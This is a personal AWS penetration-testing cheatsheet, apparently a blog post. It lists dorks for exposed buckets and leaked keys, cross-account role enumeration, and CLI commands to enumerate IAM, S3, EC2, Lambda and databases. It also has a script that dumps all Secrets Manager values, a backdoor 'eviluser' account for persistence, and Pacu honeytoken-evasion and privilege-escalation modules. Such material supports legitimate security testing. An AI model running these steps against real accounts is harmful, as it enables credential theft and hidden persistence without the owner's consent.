AWS Pentesting Cheatsheet

AWS pentesting may seem a bit annoying, but once you understand all the services and the possibilities of lateral movements and the potential for lateral movements and privilege escalation due to common misconfigurations, trust me, can be fun :), here’s just a little personal cheatsheet with commands that help me when I have to list an AWS environment.

Index

Unauthenticated Enumeration
- Dorks
- Cross-Account (“Unauthenticated”) Reconnaissance
Authenticated Enumeration
Persistence (InProgress)
- Create new user and enable login with password
Tools
- Pacu
- Scoutsuit

Unauthenticated Enumeration

Just try to find leaks with credentials/keys, or use cross-account policies in order to enumerate users/roles/services (you need the target account ID at least).

Resources:

aws-role-enumeration-iam
aws-iam-user-enumeration
enumerating-services-in-aws-accounts
This tool looks good and is referred in the posts, but I couldn’t get work :(:( Quiet-riot , An enumeration tool for scalable, unauthenticated validation of AWS..

Dorks

S3:

site:http://s3.amazonaws.com intitle:index.of.bucket
site:http://amazonaws.com inurl:".s3.amazonaws.com/"
site:.s3.amazonaws.com "Company"
intitle:index.of.bucket
site:http://s3.amazonaws.com intitle:Bucket loading
site:*.amazonaws.com inurl:index.html
site:s3.amazonaws.com filetype:sql
site:s3.amazonaws.com filetype:json
site:s3.amazonaws.com intext:"AccessKeyId"
site:s3.amazonaws.com ext:log

Creds/Keys:

filename:.bash_profile aws
rds.amazonaws.com password
filename:credentials aws_access_key_id
filename:credentials aws_secret_access_key

Cross-Account ("Unauthenticated") Reconnaissance

Enumerate Users and Roles :

You got keys?, WhoAreYou?:

aws sts get-caller-identity --query "Arn" --output text | cut -d'/' -f2

Just create a bucket on your own aws account and apply a policy. By specifying a principal in the target account , you can determine if that principals exists. If setting the bucket policy succeeds you know the role exists. If it fails you know the role does not.
You can enumerate users and roles.
You can do it manually, or using Pacu (iam__enum_roles module), or using this script: https://github.com/Frichetten/enumate_iam_using_bucket_policy-

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Example permissions",
            "Effect": "Deny",
            "Principal": {
                "AWS": "arn:aws:iam::TargetAccountID:role/role_name"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::*bucket you own*"
        }
    ]
}

Authenticated Enumeration

To find possible ways to allow lateral movement between accounts, or escalation of privileges, it is important to list them:

What permissions does my user have?
Which groups does my user belong to? –> What policies are attached to that groups?
What roles has my user assigned? –> What policies are attached to these roles?
Can my user assume other roles?
Can my user attach policies?

General enum, basic commands

Set AWS programmatic keys for authentication (use –profile= for a new profile)
1 aws configure
Enumerate users:
1 aws iam list-users

Enumerate all buckets

aws s3api list-buckets --query "Buckets[].Name"

Enumerate Groups:
1 aws iam list-groups
Enumerate IAM roles:
1 aws iam list-roles
Enumerate IAM policies:
1 aws iam list-policies
Enumerate lambda layers:
1 aws lambda list-layers
Enumerate VPCs:
1 aws ec2 describe-vpcs
Enumerate WebApps:
1 aws deploy list-applications

Instance Metadata Service URL:

curl http://169.254.169.254/latest/meta-data

General enum, deep commands

Enumerate caller identity (whoami):
1 aws sts get-caller identity

Enumerate login profile:

aws iam get-login-profile --user-name $user

Enumerate Groups for that user:

aws iam list-groups-for-user --user-name $user

Enumerate policies attached to that user:

aws iam list-attached-user-policies --user-name $user

Enumerate certificates for that user:

aws iam list-signing-certificates --user-name $user

Enumerate SSH keys for that user:

aws iam list-ssh-public-keys --user-name $user

Get SSH Keys details:

aws iam get-ssh-public-key --user-name &user --encoding PEM  
--ssh-public-key-id APKAUAWOPGE5M47NZEIT

Check MFA devices for users:
1 aws iam list-virtual-mfa-devices
Enumerate policies
1 aws iam list-policies

Enumerate group attached Policies:

aws iam list-group-policies --group-name ad-admin  
aws iam list-attached-group-policies --group-name ad-admin

Searching for customer managed policies

aws iam list-policies --scope Local | grep -A2 PolicyName

Check for policy details of ad-customer-managed-policy.

aws iam get-policy --policy-arn  
arn:aws:iam::276384657722:policy/ad-customer-managed-policy

Get the policy version document to check permissions that the policy grants

aws iam get-policy-version --policy-arn  
arn:aws:iam::276384657722:policy/ad-customer-managed-policy --version-id v1

Enumerate roles
1 aws iam list-roles

Enumerate details for roles

aws iam get-role --role-name ad-loggingrole

Enumerate policies attached to roles

aws iam list-attached-role-policies --role-name ad-loggingrole  
aws iam list-role-policies --role-name ad-loggingrole

S3 Enumeration

List S3 Buckets:
1 aws s3api list-buckets

Enumerate bucket objects:

aws s3api list-objects-v2 --bucket data-extractor-repo  
aws s3api list-objects --bucket file-uploader-saved-files

Check if S3 bucket is public:

aws s3api get-public-access-block --bucket data-extractor-repo

Download objects from tS3 bucket:

aws s3 cp s3://file-uploader-saved-files/flag

Create a bucket:

aws s3api create-bucket --bucket my-bucket --region us-east-1

Enumerate Bucket Location:

aws s3api get-bucket-location --bucket data-extractor-repo

Enumerate object versions:

aws s3api list-object-versions --bucket data-extractor-repo

Enumerate bucket policy:

aws s3api get-bucket-policy --bucket insecurecorp-code --output text | python -m  
json.tool

Enumerate buckets ACLs and object ACLs:

aws s3api get-bucket-acl --bucket file-uploader-saved-files  
aws s3api get-object-acl --bucket file-uploader-saved-files --key flag

Modify bucket policy :

aws s3api put-bucket-policy --bucket $bucketName --policy file://policy.json

Modify bucket ACL:

aws s3api put-bucket-acl --bucket  $bucketName --access-control-policy file://acl.json

EC2 Commands

Enumerate information about all instances:
1 aws ec2 describe-instances

Enumerate information about a specific region:

aws ec2 describe-instances --region $region

Enumerate information about specific instance:

aws ec2 describe-instances --instance-ids $ID
aws ec2 describe-instance-attribute --attribute userData --region $region --instance-id $instanceId --query UserData.Value --output text > encodeddata; base64 --decode encodeddata

Enumerate EC2 subnets:
1 aws ec2 describe-subnets
Enumerate EC2 network interfaces:
1 aws ec2 describe-network-interfaces

List DirectConnect (VPN) connections

aws directconnect describe-connections

Lambda Commands

Enumerate lambda layers:
1 aws lambda list-layers

Enumerate lambda layers versions and compatible runtimes:

aws lambda list-layer-versions --layer-name php-runtime

Enumerate lambda layer version information:

aws lambda get-layer-version --layer-name php-runtime --version-number 2

Enumerate lambda functions:
1 aws lambda list-functions

Enumerate lambda function details:

aws lambda get-function --function-name $functionName

Enumerate events:

aws lambda list-event-source-mappings --function-name $functionName

Databases Commands

Enumerate tables associated with the current account:
1 aws dynamodb list-tables

Enumerate information about the table:

aws dynamodb describe-table --table-name $tableName

Enumerate items and attributes in a table:

aws dynamodb scan --table-name $tableName

Enumerate backup of a table:

aws dynamodb describe-backup --backup-arn $backupArn

Add new table to your account:

aws dynamodb create-table --attribute-definitions --table-name --key-schema

Edit an item attribute or adds new item to the table:
1 aws dynamodb update-item --table-name --key

List AWS RDS (SQL):

aws rds describe-db-instances --region $regionName

Secrets enumeration Commands

List all secrets, sorts by Name:

aws secretsmanager list-secrets --query 'sort_by(SecretList, &Name)[]'

Get specific secret , as jq:

aws secretsmanager get-secret-value --secret-id $SECRET_ID | jq -r ".SecretString"

Python3 script, get all secrets:

  
#!/usr/bin/env python3

import json
import subprocess

secrets = json.loads(subprocess.getoutput("aws secretsmanager list-secrets"))
for secret in secrets.values():
    for s in secret:
        name = s.get('Name')
        data = json.loads(subprocess.getoutput("aws secretsmanager get-secret-value --secret-id {}".format(name)))
        value = data.get('SecretString')
        print("{}: {}".format(name, value))

Persistence [IN PROGRESS...]

Create new user and enable login with password

Create user:

aws iam create-user --user-name eviluser

Create login profile, you can use the next json example:

cat create-login-profile.json
{
  "UserName": "eviluser",
  "Password": "SuperSecretPassword",
  "PasswordResetRequired": false
}

Use this login profile and attach to the new user:

aws iam create-login-profile --cli-input-json file://create-login-profile.json

Tools

Pacu

Installation:

mkdir pacu && cd pacu
python3 -m venv venv && source venv/bin/activate
pip install -U pacu

Import AWS keys for a specific profile
1 import_keys <profile name>
Detect if keys are honey token keys
1 run iam__detect_honeytokens

Enumerate account information and permissions

run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami

Check for privilege escalation
1 run iam__privesc_scan

Scoutsuite